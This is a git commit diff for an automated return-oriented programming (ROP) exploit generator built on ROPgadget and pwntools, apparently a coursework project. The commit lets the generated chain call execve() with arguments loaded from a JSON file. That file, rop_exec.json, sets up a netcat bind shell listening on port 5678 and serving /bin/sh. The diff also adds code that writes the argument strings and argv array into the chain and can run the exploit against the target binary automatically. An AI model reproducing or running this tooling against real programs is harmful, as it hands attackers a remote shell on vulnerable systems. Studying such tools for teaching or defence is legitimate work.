Add execve arguments
Co-authored-by: Chris Gora <34940205+ChrisGora@users.noreply.github.com> Co-authored-by: jack bond-preston <jackbondpreston@outlook.com>
This commit is contained in:
parent
b38616fd71
commit
f92b6e9ccd
@ -86,7 +86,7 @@ architectures supported:
|
|||||||
parser.add_argument("--offset", type=str, metavar="<hexaddr>", help="Specify an offset for gadget addresses")
|
parser.add_argument("--offset", type=str, metavar="<hexaddr>", help="Specify an offset for gadget addresses")
|
||||||
parser.add_argument("--paddingLen", type=int, metavar="<nbyte>", default=6, help="Specify the padding length for the ROP chain")
|
parser.add_argument("--paddingLen", type=int, metavar="<nbyte>", default=6, help="Specify the padding length for the ROP chain")
|
||||||
parser.add_argument("--ropFile", type=str, metavar="<string>", default="rop.txt", help="The file to write the generated ROP bytes to")
|
parser.add_argument("--ropFile", type=str, metavar="<string>", default="rop.txt", help="The file to write the generated ROP bytes to")
|
||||||
parser.add_argument("--execPath", type=str, metavar="<string>", default="/bin/sh", help="Path of the executable to make execve() run")
|
parser.add_argument("--execFile", type=str, metavar="<string>", default="/bin/sh", help="Path of the executable to make execve() run")
|
||||||
parser.add_argument("--ropchain", action="store_true", help="Enable the ROP chain generation")
|
parser.add_argument("--ropchain", action="store_true", help="Enable the ROP chain generation")
|
||||||
parser.add_argument("--thumb" , action="store_true", help="Use the thumb mode for the search engine (ARM only)")
|
parser.add_argument("--thumb" , action="store_true", help="Use the thumb mode for the search engine (ARM only)")
|
||||||
parser.add_argument("--console", action="store_true", help="Use an interactive console for search engine")
|
parser.add_argument("--console", action="store_true", help="Use an interactive console for search engine")
|
||||||
|
@ -12,6 +12,7 @@ import re
|
|||||||
import codecs
|
import codecs
|
||||||
import ropgadget.rgutils as rgutils
|
import ropgadget.rgutils as rgutils
|
||||||
import binascii
|
import binascii
|
||||||
|
import json
|
||||||
|
|
||||||
from ropgadget.binary import Binary
|
from ropgadget.binary import Binary
|
||||||
from capstone import CS_MODE_32
|
from capstone import CS_MODE_32
|
||||||
@ -215,9 +216,12 @@ class Core(cmd.Cmd):
|
|||||||
self.__getGadgets()
|
self.__getGadgets()
|
||||||
self.__lookingForGadgets()
|
self.__lookingForGadgets()
|
||||||
if self.__options.ropchain:
|
if self.__options.ropchain:
|
||||||
|
with open(self.__options.execFile) as f:
|
||||||
|
exec_contents = json.load(f)
|
||||||
|
|
||||||
ROPMaker(
|
ROPMaker(
|
||||||
self.__binary, self.__gadgets, self.__options.paddingLen,
|
self.__binary, self.__gadgets, self.__options.paddingLen,
|
||||||
self.__options.ropFile, self.__options.execPath, self.__offset
|
self.__options.ropFile, exec_contents, self.__offset
|
||||||
)
|
)
|
||||||
return True
|
return True
|
||||||
|
|
||||||
|
@ -9,19 +9,18 @@
|
|||||||
|
|
||||||
import re
|
import re
|
||||||
from capstone import *
|
from capstone import *
|
||||||
from textwrap import wrap
|
|
||||||
import sys
|
import sys
|
||||||
import math
|
import math
|
||||||
from struct import pack
|
from struct import pack
|
||||||
|
|
||||||
|
|
||||||
class ROPMakerX86(object):
|
class ROPMakerX86(object):
|
||||||
def __init__(self, binary, gadgets, paddingLen, outFile, execPath, liboffset=0x0):
|
def __init__(self, binary, gadgets, paddingLen, outFile, exec, liboffset=0x0):
|
||||||
self.__binary = binary
|
self.__binary = binary
|
||||||
self.__gadgets = gadgets
|
self.__gadgets = gadgets
|
||||||
self.paddingLen = paddingLen
|
self.paddingLen = paddingLen
|
||||||
self.outFile = outFile
|
self.outFile = outFile
|
||||||
self.execPath = execPath
|
self.exec = exec
|
||||||
|
|
||||||
# If it's a library, we have the option to add an offset to the addresses
|
# If it's a library, we have the option to add an offset to the addresses
|
||||||
self.__liboffset = liboffset
|
self.__liboffset = liboffset
|
||||||
@ -46,7 +45,7 @@ class ROPMakerX86(object):
|
|||||||
if g != "ret":
|
if g != "ret":
|
||||||
if g.split()[0] == "ret" and g.split()[1] != "":
|
if g.split()[0] == "ret" and g.split()[1] != "":
|
||||||
raise
|
raise
|
||||||
print("# [+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
|
# print("# [+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
|
||||||
return [gadget, regex.group("dst"), regex.group("src")]
|
return [gadget, regex.group("dst"), regex.group("src")]
|
||||||
except:
|
except:
|
||||||
continue
|
continue
|
||||||
@ -64,7 +63,7 @@ class ROPMakerX86(object):
|
|||||||
if g != "ret":
|
if g != "ret":
|
||||||
if g.split()[0] == "ret" and g.split()[1] != "":
|
if g.split()[0] == "ret" and g.split()[1] != "":
|
||||||
raise
|
raise
|
||||||
print("# [+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
|
# print("# [+] Gadget found: 0x%x %s" %(gadget["vaddr"], gadget["gadget"]))
|
||||||
return gadget
|
return gadget
|
||||||
except:
|
except:
|
||||||
continue
|
continue
|
||||||
@ -121,24 +120,29 @@ class ROPMakerX86(object):
|
|||||||
print("\n# [-] Error - Can't find a writable section")
|
print("\n# [-] Error - Can't find a writable section")
|
||||||
return
|
return
|
||||||
|
|
||||||
|
print(f"dataAddr = 0x{dataAddr:08x}")
|
||||||
|
print(f"int 0x80 = 0x{syscall['vaddr']:08x}")
|
||||||
|
|
||||||
# prepend padding
|
# prepend padding
|
||||||
p = bytes('A' * self.paddingLen, "ascii")
|
p = bytes('A' * self.paddingLen, "ascii")
|
||||||
|
|
||||||
command = self.execPath
|
command = self.exec[0]
|
||||||
|
|
||||||
# split command into chunks of 4, prepend with /s as necessary
|
# split command into chunks of 4, prepend with /s as necessary
|
||||||
if len(command) % 4 > 0:
|
command = padding_len(len(command)) * "/" + command
|
||||||
command = padding_len(len(command)) * "/" + command
|
|
||||||
command_chunks = wrap(command, 4)
|
command_chunks = wrap(command, 4)
|
||||||
|
|
||||||
## EXEC (ARG0) \0 ARG1 \0 ARG2 \0 ... \0 PTR->EXEC PTR->ARG1 PTR->ARG2 ... \0 ##
|
## EXEC (ARG0) \0 ARG1 \0 ARG2 \0 ... \0 PTR->EXEC PTR->ARG1 PTR->ARG2 ... \0 ##
|
||||||
|
|
||||||
args = ["test", "test1", "long string example"]
|
args = self.exec[1:]
|
||||||
chunked_args = []
|
chunked_args = []
|
||||||
for arg in args:
|
for arg in args:
|
||||||
if len(arg) % 4 > 0:
|
arg = arg + padding_len(len(arg)) * "!"
|
||||||
arg = arg + padding_len(len(arg)) * "!"
|
print(arg)
|
||||||
chunked_args.append(wrap)
|
chunked_args.append(wrap(arg, 4))
|
||||||
|
|
||||||
|
print(chunked_args)
|
||||||
|
|
||||||
# & ( "cat" \0 )
|
# & ( "cat" \0 )
|
||||||
exec_addr = dataAddr
|
exec_addr = dataAddr
|
||||||
|
|
||||||
@ -185,7 +189,24 @@ class ROPMakerX86(object):
|
|||||||
# Write Argument Strings #
|
# Write Argument Strings #
|
||||||
##########################
|
##########################
|
||||||
|
|
||||||
|
for i, arg in enumerate(chunked_args):
|
||||||
|
this_arg_addr = arg_addr[i]
|
||||||
|
|
||||||
|
for j, chunk in enumerate(arg):
|
||||||
|
address = this_arg_addr + (j * 4)
|
||||||
|
|
||||||
|
# write 4 char chunk of the command
|
||||||
|
p += self.__write4bytes(
|
||||||
|
address,
|
||||||
|
bytes(chunk, "ascii"),
|
||||||
|
dataAddr, popDst, popSrc, write4where
|
||||||
|
)
|
||||||
|
|
||||||
|
p += self.__write4nulls(
|
||||||
|
this_arg_addr + len(args[i]),
|
||||||
|
popDst, xorSrc, write4where
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
####################
|
####################
|
||||||
# Write Argv Array #
|
# Write Argv Array #
|
||||||
@ -198,6 +219,13 @@ class ROPMakerX86(object):
|
|||||||
dataAddr, popDst, popSrc, write4where
|
dataAddr, popDst, popSrc, write4where
|
||||||
)
|
)
|
||||||
|
|
||||||
|
for i, address in enumerate(arg_addr):
|
||||||
|
p += self.__write4bytes(
|
||||||
|
argv_addr + ((i + 1) * 4),
|
||||||
|
pack('<I', address),
|
||||||
|
dataAddr, popDst, popSrc, write4where
|
||||||
|
)
|
||||||
|
|
||||||
# write null byte after argv array
|
# write null byte after argv array
|
||||||
p += self.__write4nulls(
|
p += self.__write4nulls(
|
||||||
argv_addr + (len(args) * 4) + 4,
|
argv_addr + (len(args) * 4) + 4,
|
||||||
@ -243,9 +271,9 @@ class ROPMakerX86(object):
|
|||||||
# To find the smaller gadget
|
# To find the smaller gadget
|
||||||
self.__gadgets.reverse()
|
self.__gadgets.reverse()
|
||||||
|
|
||||||
print("\n# ROP chain generation\n# ===========================================================")
|
# print("\n# ROP chain generation\n# ===========================================================")
|
||||||
|
|
||||||
print("\n# - Step 1 -- Write-what-where gadgets\n")
|
# print("\n# - Step 1 -- Write-what-where gadgets\n")
|
||||||
|
|
||||||
gadgetsAlreadyTested = []
|
gadgetsAlreadyTested = []
|
||||||
while True:
|
while True:
|
||||||
@ -274,7 +302,7 @@ class ROPMakerX86(object):
|
|||||||
else:
|
else:
|
||||||
break
|
break
|
||||||
|
|
||||||
print("\n# - Step 2 -- Init syscall number gadgets\n")
|
# print("\n# - Step 2 -- Init syscall number gadgets\n")
|
||||||
|
|
||||||
xorEax = self.__lookingForSomeThing("xor eax, eax")
|
xorEax = self.__lookingForSomeThing("xor eax, eax")
|
||||||
if not xorEax:
|
if not xorEax:
|
||||||
@ -286,7 +314,7 @@ class ROPMakerX86(object):
|
|||||||
print("# [-] Can't find the 'inc eax' instruction")
|
print("# [-] Can't find the 'inc eax' instruction")
|
||||||
return
|
return
|
||||||
|
|
||||||
print("\n# - Step 3 -- Init syscall arguments gadgets\n")
|
# print("\n# - Step 3 -- Init syscall arguments gadgets\n")
|
||||||
|
|
||||||
popEbx = self.__lookingForSomeThing("pop ebx")
|
popEbx = self.__lookingForSomeThing("pop ebx")
|
||||||
if not popEbx:
|
if not popEbx:
|
||||||
@ -303,14 +331,14 @@ class ROPMakerX86(object):
|
|||||||
print("# [-] Can't find the 'pop edx' instruction")
|
print("# [-] Can't find the 'pop edx' instruction")
|
||||||
return
|
return
|
||||||
|
|
||||||
print("\n# - Step 4 -- Syscall gadget\n")
|
# print("\n# - Step 4 -- Syscall gadget\n")
|
||||||
|
|
||||||
syscall = self.__lookingForSomeThing("int 0x80")
|
syscall = self.__lookingForSomeThing("int 0x80")
|
||||||
if not syscall:
|
if not syscall:
|
||||||
print("# [-] Can't find the 'syscall' instruction")
|
print("# [-] Can't find the 'syscall' instruction")
|
||||||
return
|
return
|
||||||
|
|
||||||
print("\n# - Step 5 -- Build the ROP chain\n")
|
# print("\n# - Step 5 -- Build the ROP chain\n")
|
||||||
|
|
||||||
self.__buildRopChain(write4where[0], popDst, popSrc, xorSrc, xorEax, incEax, popEbx, popEcx, popEdx, syscall)
|
self.__buildRopChain(write4where[0], popDst, popSrc, xorSrc, xorEax, incEax, popEbx, popEcx, popEdx, syscall)
|
||||||
|
|
||||||
@ -319,3 +347,6 @@ class ROPMakerX86(object):
|
|||||||
|
|
||||||
def padding_len(x):
|
def padding_len(x):
|
||||||
return -(x % -4)
|
return -(x % -4)
|
||||||
|
|
||||||
|
def wrap(str, n):
|
||||||
|
return [ str[i:i + n] for i in range(0, len(str), n) ]
|
||||||
|
11
autoRop.py
11
autoRop.py
@ -4,6 +4,7 @@ import math
|
|||||||
import os
|
import os
|
||||||
import subprocess
|
import subprocess
|
||||||
import sys
|
import sys
|
||||||
|
import json
|
||||||
from contextlib import redirect_stderr
|
from contextlib import redirect_stderr
|
||||||
|
|
||||||
from pwnlib.context import context
|
from pwnlib.context import context
|
||||||
@ -35,15 +36,16 @@ print(r'''
|
|||||||
arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
|
arg_parser = argparse.ArgumentParser(description="Run an automated ROP on an executable")
|
||||||
arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
|
arg_parser.add_argument("exec_file", metavar="exec_file", type=str, help="The executable file to exploit")
|
||||||
arg_parser.add_argument("--rop_file", metavar="rop_file", default="rop.txt", type=str, help="The name of the generated ROP input file")
|
arg_parser.add_argument("--rop_file", metavar="rop_file", default="rop.txt", type=str, help="The name of the generated ROP input file")
|
||||||
arg_parser.add_argument("--rop_exec", metavar="rop_exec", default="/bin/sh", type=str, help="The path to the executable the ROP should run")
|
arg_parser.add_argument("--rop_exec_file", metavar="rop_exec", default="rop_exec.json", type=str, help="The path to the file containing the command for the ROP to run")
|
||||||
arg_parser.add_argument("--min_payload", metavar="min", default=32, type=int, help="The minimum payload length to try")
|
arg_parser.add_argument("--min_payload", metavar="min", default=32, type=int, help="The minimum payload length to try")
|
||||||
arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try")
|
arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int, help="The maximum payload length to try")
|
||||||
arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
|
arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
|
||||||
|
|
||||||
args = arg_parser.parse_args()
|
args = arg_parser.parse_args()
|
||||||
|
|
||||||
exec_file = args.exec_file
|
exec_file = args.exec_file
|
||||||
rop_file = args.rop_file
|
rop_file = args.rop_file
|
||||||
rop_exec = args.rop_exec
|
rop_exec_file = args.rop_exec_file
|
||||||
min_payload = args.min_payload
|
min_payload = args.min_payload
|
||||||
max_payload = args.max_payload
|
max_payload = args.max_payload
|
||||||
run = args.run
|
run = args.run
|
||||||
@ -96,15 +98,18 @@ result = subprocess.run(
|
|||||||
"--silent",
|
"--silent",
|
||||||
"--paddingLen", str(offset),
|
"--paddingLen", str(offset),
|
||||||
"--ropFile", rop_file,
|
"--ropFile", rop_file,
|
||||||
"--execPath", rop_exec
|
"--execFile", rop_exec_file,
|
||||||
],
|
],
|
||||||
stdout = subprocess.PIPE
|
stdout = subprocess.PIPE
|
||||||
)
|
)
|
||||||
|
with open("log/ropgadget.log", "wb") as f:
|
||||||
|
f.write(result.stdout)
|
||||||
|
|
||||||
print(f" └─[🤩] All done! The ROP input is saved to {rop_file}!")
|
print(f" └─[🤩] All done! The ROP input is saved to {rop_file}!")
|
||||||
|
|
||||||
if run:
|
if run:
|
||||||
pwnlibexit._run_handlers()
|
pwnlibexit._run_handlers()
|
||||||
|
|
||||||
print()
|
print()
|
||||||
print(f"[ Run Program : ./{exec_file} {rop_file} ]")
|
print(f"[ Run Program : ./{exec_file} {rop_file} ]")
|
||||||
os.execv(exec_file, [exec_file, rop_file])
|
os.execv(exec_file, [exec_file, rop_file])
|
||||||
|
1
rop_exec.json
Normal file
1
rop_exec.json
Normal file
@ -0,0 +1 @@
|
|||||||
|
["/home/vagrant/cw/netcat-0.7.1/src/netcat", "-lnp", "5678", "-tte", "/bin/sh"]
|
Loading…
Reference in New Issue
Block a user